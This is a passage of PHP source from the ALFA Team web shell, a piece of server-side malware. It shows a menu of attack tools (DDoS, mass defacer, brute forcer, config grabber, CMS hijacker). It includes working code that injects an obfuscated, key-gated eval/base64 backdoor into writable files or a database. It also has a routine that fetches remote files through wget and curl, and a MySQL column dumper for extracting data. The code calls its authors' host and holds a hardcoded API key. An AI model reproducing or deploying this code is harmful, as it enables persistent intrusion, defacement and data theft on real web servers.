1219'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
1220'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
1221'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
1222'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'
1223);
1224foreach($li as $key=>$value){
1225echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
1226}
1227echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path='.$GLOBALS['cwd'].'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path='.$GLOBALS['cwd'].'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path='.$GLOBALS['cwd'].'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>':'').'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="'.$GLOBALS['cwd'].'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';}else{
1228@error_reporting(E_ALL ^ E_NOTICE);
1229@ini_set('error_log',NULL);
1230@ini_set('log_errors',0);
1231@ini_set('max_execution_time',0);
1232@ini_set('magic_quotes_runtime', 0);
1233@set_time_limit(0);
1234}}
1235function alfalogout(){
1236@setcookie("AlfaUser", null, 2012);
1237@setcookie("AlfaPass", null, 2012);
1238unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
1239echo("ok");
1240}
1241function showAnimation($name){
1242 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
1243}
1244function __showicon($r){
1245 $s['btn']='http://solevisible.com/images/btn.png';
1246 $s['alfamini']='http://solevisible.com/images/alfamini.png';
1247 $s['loader']='http://solevisible.com/images/loader.svg';
1248 //return 'data:image/png;base64,'.__get_resource($s[$r]);
1249 return $s[$r];
1250}
1251function alfainbackdoor(){
1252alfahead();
1253echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1254$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1255$success= '<font color="green">Success...!';
1256$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
1257$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1258$cwd = 'Example: /home/alfa/public_html/index.php';
1259if($_POST['alfa1']=='file'){
1260echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1261if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
1262$method = $_POST['alfa2'];
1263$file = $_POST['alfa3'];
1264$shell = $_POST['alfa4'];
1265$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
1266if($key=='')$key='alfa';
1267if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1268$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
1269if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
1270if($_POST['alfa1']=='db'){
1271echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
1272$table = array('td1' =>
1273array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1274'td2' =>
1275array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1276'td3' =>
1277array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1278'td4' =>
1279array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1280'td5' =>
1281array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
1282'td6' =>
1283array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
1284);
1285create_table($table);
1286echo("<p>{$select}</p>");
1287echo($textarea);
1288echo("<p><input type='submit' value=' '></p></form></p></center>");
1289if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
1290$dbhost = $_POST['alfa2'];
1291$dbuser = $_POST['alfa3'];
1292$dbpw = $_POST['alfa4'];
1293$dbname = $_POST['alfa5'];
1294$file = $_POST['alfa6'];
1295$method = $_POST['alfa7'];
1296$shell = $_POST['alfa8'];
1297$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
1298if($key=='')$key='alfa';
1299if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1300if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
1301$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
1302if(@is_file($file)&&@is_writable($file)){
1303@mysqli_query($conn,'DROP TABLE `alfa_bc`');
1304@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1305@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
1306@file_put_contents($file,$code."\n".@file_get_contents($file));
1307__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
1308echo('</div>');
1309alfafooter();
1310}
1311function alfawhois(){
1312echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1313if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
1314$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
1315$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
1316$data = @file_get_contents($target);
1317if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
1318$target = @json_decode($data,true);
1319echo __pre();
1320if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
1321echo("</div>");
1322}
1323function alfaremotedl(){
1324alfahead();
1325echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
1326<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
1327<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
1328<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
1329</form></p></center>");
1330if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
1331echo __pre();
1332$url = $_POST['alfa1'];
1333$path = $_POST['alfa2'];
1334echo('<center>');
1335if(__download($url,$path)){
1336echo('<font color="green">Success...!</font>');
1337}else{
1338echo('<font color="red">Error...!</font>');
1339}
1340echo('</center>');
1341}
1342echo("</div>");
1343alfafooter();
1344}
1345function __download($url,$path=false){
1346if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
1347$saveas = basename(rawurldecode($url));
1348if($path){$saveas=$path.$saveas;}
1349if($content = __read_file($url)){
1350if(@is_file($saveas))@unlink($saveas);
1351if(__write_file($saveas, $content)){return true;}}
1352$buff = alfaEx("wget ".$url." -O ".$saveas);
1353if(@is_file($saveas)) return true;
1354$buff = alfaEx("curl ".$url." -o ".$saveas);
1355if(@is_file($saveas)) return true;
1356$buff = alfaEx("lwp-download ".$url." ".$saveas);
1357if(@is_file($saveas)) return true;
1358$buff = alfaEx("lynx -source ".$url." > ".$saveas);
1359if(@is_file($saveas)) return true;
1360$buff = alfaEx("GET ".$url." > ".$saveas);
1361if(@is_file($saveas)) return true;
1362$buff = alfaEx("links -source ".$url." > ".$saveas);
1363if(@is_file($saveas)) return true;
1364$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
1365if(@is_file($saveas)) return true;
1366return false;
1367}
1368function clean_string($string){
1369 if(function_exists("iconv")){
1370 $s = trim($string);
1371 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
1372 }
1373 return $s;
1374}
1375function __read_file($file, $boom = true){
1376$content = false;
1377if($fh = @fopen($file, "rb")){
1378$content = "";
1379while(!feof($fh)){
1380$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
1381}
1382@fclose($fh);
1383}
1384if(empty($content)||!$content){
1385 $content = alfaEx("cat '".addslashes($file)."'");
1386}
1387return $content;
1388}
1389function alfaMarket(){
1390echo "<div class='header'>";
1391$curl = new AlfaCURL();
1392$content = $curl->Send("http://solevisible.com/market.php");
1393$data = @json_decode($content, true);
1394if(!empty($data)){
1395if($data["status"] == "open"){
1396 echo $data["content"];
1397}else{
1398 echo $data["error_msg"];
1399}
1400}else{
1401 echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
1402}
1403echo "</div>";
1404}
1405function alfaSettings(){
1406alfahead();
1407AlfaNum(6,7,8,9,10);
1408echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a></h3></center>';
1409if($_POST["alfa8"] == "main"){
1410echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
1411$lg_array = array('0'=>'No','1'=>'Yes');
1412$penc_array = array('false'=>'No','true'=>'Yes');
1413$protect_html = "";
1414$icon_html = "";
1415$postEnc_html = "";
1416$login_html = "";
1417$cgiapi_html = "";
1418foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
1419foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
1420foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
1421foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
1422$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
1423foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
1424echo '';
1425echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
1426if($_POST['alfa5']=='>>'){
1427echo __pre();
1428if(!empty($_POST['alfa3'])){
1429$protect = $_POST['alfa1'];
1430$lgpage = $_POST['alfa2'];
1431$username = $_POST['alfa3'];
1432$password = md5($_POST['alfa4']);
1433$icon = $_POST['alfa6'];
1434$post_encrypt = $_POST['alfa7'];
1435$cgi_api_val = $_POST['alfa9'];
1436@chdir($GLOBALS['home_cwd']);
1437$basename = @basename($_SERVER['PHP_SELF']);
1438$data = @file_get_contents($basename);
1439$user_rand = $GLOBALS["DB_NAME"]["user_rand"];
1440$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
1441$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
1442$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
1443$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
1444$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
1445$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
1446$find_user = '/\''.$user_rand.'\'(.*?),/i';
1447$find_pw = '/\''.$pass_rand.'\'(.*?),/i';
1448$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
1449$find_p = '/\''.$safemode_rand.'\'(.*?),/i';
1450$icons = '/\''.$show_icons_rand.'\'(.*?),/i';
1451$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
1452$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
1453if(!empty($username)&&preg_match($find_user,$data,$e)){
1454$new = '\''.$user_rand.'\' => \''.$username.'\',';
1455$data = str_replace($e[0],$new,$data);
1456}
1457if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
1458$new = '\''.$pass_rand.'\' => \''.$password.'\',';
1459$data = str_replace($e[0],$new,$data);
1460}
1461if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
1462$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
1463$data = str_replace($e[0],$new,$data);
1464}
1465if(!empty($find_p)&&preg_match($find_p,$data,$e)){
1466$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
1467$data = str_replace($e[0],$new,$data);
1468}
1469if(preg_match($icons,$data,$e)){
1470$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
1471$data = str_replace($e[0],$new,$data);
1472}
1473if(preg_match($postEnc,$data,$e)){
1474$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
1475$data = str_replace($e[0],$new,$data);
1476}
1477if(preg_match($cgi_api_reg,$data,$e)){
1478$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
1479$data = str_replace($e[0],$new,$data);
1480}
1481if(@file_put_contents($basename,$data)){
1482echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
1483}else{
1484__alert("<span style='color:red;'>File has no edit access...!</span>");
1485}
1486}else{
1487__alert("<span style='color:red;'>UserName is Empty !</span>");
1488}
1489}
1490}elseif($_POST["alfa8"] == "color"){
1491echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
1492echo '<table border="1"><tbody>';
1493$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
1494$x = 1;
1495foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
1496 $multi = "";
1497 if(is_array($value)){
1498 if(isset($value["multi_selector"])){
1499 $multi = __ZW5jb2Rlcg(json_encode($value));
1500 }
1501 }
1502 $value = alfa_getColor($key);
1503 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
1504 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
1505}
1506echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
1507
1508echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
1509if($_POST['alfa7']=='export'){
1510 echo __pre();
1511 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
1512 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1513 $array = array();
1514 foreach($glob_colors as $k => $v){
1515 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
1516 $v = trim($colors[$k]);
1517 }else{
1518 $v = trim(is_array($v)?$v["key_color"]:$v);
1519 }
1520 $array[$k] = $v;
1521 }
1522 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
1523 $config = json_encode($array, JSON_PRETTY_PRINT);
1524 if(!@file_put_contents($file, $config)){
1525 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
1526 }else{
1527 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
1528 }
1529}
1530if($_POST['alfa2']=='>>'){
1531 echo __pre();
1532 $colors = json_decode($_POST["alfa1"],true);
1533 $array = "";
1534 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
1535 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1536 foreach($glob_colors as $k => $v){
1537 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
1538 $v = trim($colors[$k]);
1539 }else{
1540 $v = trim(is_array($v)?$v["key_color"]:$v);
1541 }
1542 $array .= '"'.trim($k).'" => "'.$v.'",';
1543 }
1544 @chdir($GLOBALS['home_cwd']);
1545 $basename = @basename($_SERVER['PHP_SELF']);
1546 $data = @file_get_contents($basename);
1547 $color = '/\'color\'(.*?)\),/s';
1548 if(preg_match($color,$data,$e)){
1549 $new = "'color' => array(".$array."),";
1550 $data = str_replace($e[0],$new,$data);
1551 if(@file_put_contents($basename, $data)){
1552 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
1553 }else{
1554 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
1555 }
1556 }else{
1557 echo("<center><p><h3>[-] Error...!</h3></p></center>");
1558 }
1559}
1560}
1561echo('</div>');
1562alfafooter();
1563}
1564function alfaaboutus(){
1565alfahead();
1566echo '<div class="header">';
1567$news = new AlfaCURL();
1568$about_us = $news->Send("http://solevisible.com/aboutus.php");
1569if(empty($about_us)){
1570$about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
1571<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
1572<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
1573<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
1574<font color='#00A220'>Telegram Channel: @solevisible</font><br>
1575<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
1576<font color='#FFFFFF'>Skype : sole.sad</font><br>
1577<font color='#FF0000'>Persian Gulf For Ever</font><br>
1578<font color='#FF0000'>Iranian Programmers</font><br>
1579<font color='#FF0000'>############</font><br>
1580</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
1581}
1582echo __pre().$about_us;
1583echo('</div>');
1584alfafooter();
1585}
1586function alfacoldumper(){
1587alfahead();
1588echo('<div class="header">');
1589AlfaNum(8,9,10);
1590echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
1591$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
1592$selected_data = json_decode($_POST['alfa2'], true);
1593$username = ($_POST['alfa3']);
1594$password = ($_POST['alfa4']);
1595$dbname = ($_POST['alfa5']);
1596$dfile = ($_POST['alfa6']);
1597$host = ($_POST['alfa7']);
1598$table = array('td1' =>
1599 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
1600 'td2' =>
1601 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
1602 'td3' =>
1603 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
1604 'td4' =>
1605 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
1606 'td5' =>
1607 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
1608);
1609create_table($table);
1610echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1611$db = false;
1612if(!empty($dbname)){
1613 $db = @mysqli_connect($host, $username, $password, $dbname);
1614}
1615if(count($selected_data) > 0){
1616 if($db){
1617 if(!is_dir($dfile)){
1618 $dfile = $GLOBALS['cwd'];
1619 }
1620 $tbls = "";
1621 $ext = '.txt';
1622 if($delimiter == 'json'){
1623 $ext = '.json';
1624 }
1625 foreach ($selected_data as $tbl => $cols) {
1626 $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
1627 $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
1628 $fp = fopen($file_name, "w");
1629 $data = array();
1630 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
1631 if($delimiter == "json"){
1632 $col_arr = array();
1633 foreach ($row as $key => $value) {
1634 if(empty($value)){
1635 $value = "[empty]";
1636 }
1637 $col_arr[$key] = $value;
1638 }
1639 $data[$tbl][] = $col_arr;
1640 }else{
1641 $data = "";
1642 foreach ($row as $key => $value) {
1643 if(empty($value)){
1644 $value = "[empty]";
1645 }
1646 $data .= $value . $delimiter;
1647 }
1648 fwrite($fp, $data ."\n");
1649 }
1650 }
1651 if($delimiter == "json"){
1652 fwrite($fp, json_encode($data));
1653 }
1654 fclose($fp);
1655 $tbls .= "Done ~~~> ".$file_name."<br>";
1656 }
1657 echo __pre();
1658 echo "<center><font color='#00FF00'>".$tbls."</font></center>";
1659 }
1660}
1661if(!empty($dbname) && count($selected_data) == 0){
1662//echo __pre();
1663if($db){
1664 echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
1665 echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
1666 $data = array();
1667 $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
1668 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
1669 $data[$row["table_name"]] = array();
1670 $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
1671 $table_count = mysqli_fetch_row($table_count_q);
1672 $data[$row["table_name"]]["data_count"] = $table_count[0];
1673 $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
1674 while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
1675 $data[$row["table_name"]]["cols"][] = $row2["column_name"];
1676 }
1677 }
1678 mysqli_close($db);
1679
1680 echo '<ul id="myUL">';
1681 foreach($data as $tbl => $cols){
1682 echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
1683 foreach($cols["cols"] as $col){
1684 echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
1685 }
1686 echo '</ul></li>';
1687 }
1688 echo '</ul>';
1689}else{
1690echo('<center>mysqli_connect : Error!</center>');
1691}
1692}
1693echo('</div>');
1694alfafooter();
1695}
1696function alfaDumper(){
1697alfahead();
